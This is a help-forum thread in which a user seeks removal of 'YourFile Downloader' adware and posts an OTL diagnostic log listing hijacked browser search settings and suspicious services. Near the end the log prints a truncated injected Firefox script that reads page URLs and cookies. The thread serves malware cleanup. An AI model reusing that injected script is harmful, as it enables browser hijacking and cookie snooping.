Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Your File Downloader keeps popping up on the admin start up [Closed]

YourFile Downloader Malware Virus Infection

  • This topic is locked This topic is locked

#1
inked_illusion

inked_illusion

    New Member

  • Member
  • Pip
  • 5 posts

Hello all,

 

Hope it's not much to ask but I need help with my family's computer. 

 

Long story short, despite knowing that it could lead to malware, I ended up downloading something that I should've stayed away from

(which included YourFile Downloader attached to it).   Fortunately, I managed to stop it well before it could download itself yet somehow

I have a feeling that it was too late.  Sure enough, it is now in the computer somewhere and I can't seem to find it. 

 

I have uninstalled the Adanak and all it's other variations in the Control Panel, as well as removing Fast Tab add on Mozilla Firefox. 

Problem is, no matter what, whenever I log onto as the main account, Your File Downloader keeps popping up the very first thing

(and I always cancel even if it prompts me to a somewhat defunct website). 

 

I have also installed OTL as recommended by one of the previous threads here.  Still I'm fearing that this might slow the computer down and worse

yet, my parents might accidentally download it causing more harm.

 

I know it's a bit much to ask but this is just me trying as quick as I can to fix it well before they even notice it.

 

Anyways thanks for reading and have a good day.

 

inked


  • 0

Advertisements


#2
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
OTL is just an analysis tool and I will remove it when we are finished, it has no affect on the system

Download OTL to your Desktop
Secondary link
  • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.

    OTL_Main_Tutorial.gif
  • Select All Users
  • Select LOP and Purity
  • Under the Custom Scan box paste this in

    netsvcs
    BASESERVICES
    %SYSTEMDRIVE%\*.exe
    c:\program files (x86)\Google\Desktop
    c:\program files\Google\Desktop
    dir "%systemdrive%\*" /S /A:L /C
    /md5start
    rpcss.dll
    /md5stop
    CREATERESTOREPOINT
  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
    • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
    • Attach both logs

  • 0

#3
inked_illusion

inked_illusion

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts
Somehow I only got one notepad (OTL.txt) instead of two so I do now know why I didn't get Extras.txt.  Anyways attached is the log I got for OTL.txt

Attached File  OTL.Txt   268.82KB   483 downloads
 
I hope this is enough information for you. 
Thanks again by the way.
 
inked

OTL logfile created on: 7/26/2014 8:01:57 PM - Run 3
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\VPaez\Desktop\Ian's stuff
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17207)
Locale: 00000409 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy

3.91 Gb Total Physical Memory | 2.41 Gb Available Physical Memory | 61.75% Memory free
7.82 Gb Paging File | 6.19 Gb Available in Paging File | 79.19% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.48 Gb Total Space | 511.28 Gb Free Space | 55.60% Space Free | Partition Type: NTFS
Drive D: | 11.93 Gb Total Space | 1.46 Gb Free Space | 12.23% Space Free | Partition Type: NTFS
Drive E: | 275.41 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

Computer Name: VPAEZ-HP | User Name: VPaez | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014/07/26 02:13:49 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\VPaez\Desktop\Ian's stuff\OTL.exe
PRC - [2014/07/26 00:09:24 | 000,702,344 | ---- | M] (Cherished Technololgy LIMITED) -- C:\ProgramData\IePluginServices\PluginService.exe
PRC - [2014/06/18 20:53:22 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2013/12/18 12:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/04/26 12:11:16 | 000,729,600 | ---- | M] () -- c:\ProgramData\MyApps\SN.Booster\SN.Booster.exe
PRC - [2011/04/24 23:15:02 | 000,202,296 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe
PRC - [2011/02/01 02:49:44 | 001,127,448 | ---- | M] (PDF Complete Inc) -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe
PRC - [2011/02/01 01:41:24 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2011/02/01 01:41:20 | 000,326,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe


========== Modules (No Company Name) ==========

MOD - [2014/06/18 20:53:21 | 003,852,912 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/04/26 12:11:13 | 004,296,192 | ---- | M] () -- c:\Program Files (x86)\GS Supporter\Assistant.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 20:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2011/04/24 23:13:30 | 007,008,656 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtgui4.dll
MOD - [2011/04/24 23:13:28 | 000,192,912 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtsql4.dll
MOD - [2011/04/24 23:13:26 | 001,270,160 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtscript4.dll
MOD - [2011/04/24 23:13:26 | 000,758,160 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtnetwork4.dll
MOD - [2011/04/24 23:13:24 | 002,118,032 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtcore4.dll
MOD - [2011/04/24 23:13:24 | 002,089,360 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\qtdeclarative4.dll
MOD - [2011/04/20 19:56:28 | 000,025,088 | ---- | M] () -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\imageformats\qgif4.dll


========== Services (SafeList) ==========

SRV:64bit: - [2014/06/18 18:24:12 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/05/26 23:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/12/13 14:37:16 | 000,194,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2010/10/11 03:48:14 | 000,346,168 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe -- (HPClientSvc)
SRV:64bit: - [2010/09/22 19:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:64bit: - [2009/07/13 19:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rundll32.exe -- (e9f32388)
SRV - [2014/07/26 00:09:24 | 000,702,344 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\IePluginServices\PluginService.exe -- (IePluginServices)
SRV - [2014/07/08 16:21:08 | 000,262,320 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/06/30 15:46:52 | 000,542,400 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/06/18 20:53:21 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/12/18 12:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/09/11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2013/09/05 10:34:30 | 000,171,680 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/12/04 11:13:34 | 000,008,704 | ---- | M] (Hi-Rez Studios) [Auto | Paused] -- C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe -- (HiPatchService)
SRV - [2011/04/24 23:15:02 | 000,202,296 | ---- | M] (Kaspersky Lab ZAO) [Auto | Running] -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe -- (AVP)
SRV - [2011/02/01 02:49:44 | 001,127,448 | ---- | M] (PDF Complete Inc) [Auto | Running] -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe -- (pdfcDispatcher)
SRV - [2011/02/01 01:41:24 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2011/02/01 01:41:20 | 000,326,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2010/10/12 11:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
SRV - [2009/06/10 15:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)


========== Driver Services (SafeList) ==========

DRV:64bit: - [2013/07/08 11:36:41 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/12/13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/03/23 14:59:34 | 000,615,728 | ---- | M] (Kaspersky Lab) [File_System | System | Running] -- C:\Windows\SysNative\drivers\klif.sys -- (KLIF)
DRV:64bit: - [2012/03/01 00:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/15 10:32:29 | 000,087,456 | ---- | M] (LogMeIn, Inc.) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\LMIRfsClientNP.dll -- (LMIRfsClientNP)
DRV:64bit: - [2011/05/13 15:37:54 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2011/05/13 04:21:04 | 000,177,640 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadmdm.sys -- (ssadmdm)
DRV:64bit: - [2011/05/13 04:21:04 | 000,146,920 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadserd.sys -- (ssadserd)
DRV:64bit: - [2011/05/13 04:21:02 | 000,157,672 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadbus.sys -- (ssadbus)
DRV:64bit: - [2011/05/13 04:21:02 | 000,036,328 | ---- | M] (Google Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadadb.sys -- (androidusb)
DRV:64bit: - [2011/05/13 04:21:02 | 000,016,872 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssadmdfl.sys -- (ssadmdfl)
DRV:64bit: - [2011/03/11 00:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 00:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/03/10 18:36:24 | 000,029,488 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\klim6.sys -- (KLIM6)
DRV:64bit: - [2011/03/04 13:23:28 | 000,011,864 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\kl2.sys -- (kl2)
DRV:64bit: - [2011/03/04 13:23:24 | 000,460,888 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\kl1.sys -- (KL1)
DRV:64bit: - [2011/01/26 20:57:12 | 012,273,408 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/01/11 19:04:04 | 000,072,216 | ---- | M] (LogMeIn, Inc.) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\LMIRfsDriver.sys -- (LMIRfsDriver)
DRV:64bit: - [2011/01/11 19:04:00 | 000,011,552 | ---- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\lmimirr.sys -- (lmimirr)
DRV:64bit: - [2010/12/28 13:45:54 | 000,412,776 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2010/12/13 14:37:18 | 000,036,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nx6000.sys -- (MSHUSBVideo)
DRV:64bit: - [2010/11/20 21:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 21:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 21:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/11/05 12:45:48 | 000,438,808 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2010/11/04 22:57:54 | 001,041,760 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netr28x.sys -- (netr28x)
DRV:64bit: - [2010/10/19 05:34:26 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2010/02/26 03:32:12 | 000,158,976 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)
DRV:64bit: - [2009/11/02 20:27:10 | 000,022,544 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\klmouflt.sys -- (klmouflt)
DRV:64bit: - [2009/07/13 19:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 19:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 19:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/10 14:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 14:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 14:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 14:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV:64bit: - [2008/11/11 14:42:00 | 000,033,792 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64modem.sys -- (USBModem)
DRV:64bit: - [2008/11/11 14:42:00 | 000,027,136 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64diag.sys -- (UsbDiag)
DRV:64bit: - [2008/11/11 14:42:00 | 000,017,920 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lgx64bus.sys -- (usbbus)
DRV - [2009/07/13 19:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.v9.com...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.v9.com...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.v9.com/?t...psd&t=34640bb62
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}: "URL" = http://search.ask.co...&l=dis&o=HPDTDF
IE:64bit: - HKLM\..\SearchScopes\{537A820F-7758-4D20-A1C6-818598E9FD0A}: "URL" = http://www.amazon.ca...s={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://ca.search.yah...psg&type=HPDTDF
IE:64bit: - HKLM\..\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}: "URL" = http://en.wikipedia....h={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.v9.com...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.v9.com...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.v9.com/?t...psd&t=34640bb62
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = http://search.certif...t=home&tid=2938
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.certif...q={searchTerms}
IE - HKLM\..\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}: "URL" = http://search.ask.co...&l=dis&o=HPDTDF
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://search.v9.com...q={searchTerms}
IE - HKLM\..\SearchScopes\{537A820F-7758-4D20-A1C6-818598E9FD0A}: "URL" = http://www.amazon.ca...s={searchTerms}
IE - HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://ca.search.yah...psg&type=HPDTDF
IE - HKLM\..\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}: "URL" = http://en.wikipedia....h={searchTerms}


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.v9.com/?t...psd&t=34640bb62
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:Tabs
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certif...d=2938&st=bs&q=
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = http://search.certif...t=home&tid=2938
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\URLSearchHook: {687578b9-7132-4a7a-80e4-30ee31099e03} - No CLSID value found
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes,DefaultScope = 98A4F9928983430CA0DEE4493D379A23
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{28D2B7FC-879A-4783-AD9C-F8D0874E8115}: "URL" = http://websearch.ask...56-F2C01330C0E6
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}: "URL" = http://search.ask.co...&l=dis&o=HPDTDF
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{537A820F-7758-4D20-A1C6-818598E9FD0A}: "URL" = http://www.amazon.ca...s={searchTerms}
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://ca.search.yah...psg&type=HPDTDF
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}: "URL" = http://en.wikipedia....h={searchTerms}
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\{D77422D0-23B2-4A8E-BD33-A367AA9DA575}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\..\SearchScopes\98A4F9928983430CA0DEE4493D379A23: "URL" = http://search.condui...6919856144&UM=2
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-39689524-2389588003-3980284778-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "v9"
FF - prefs.js..extensions.9FDrVT.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=5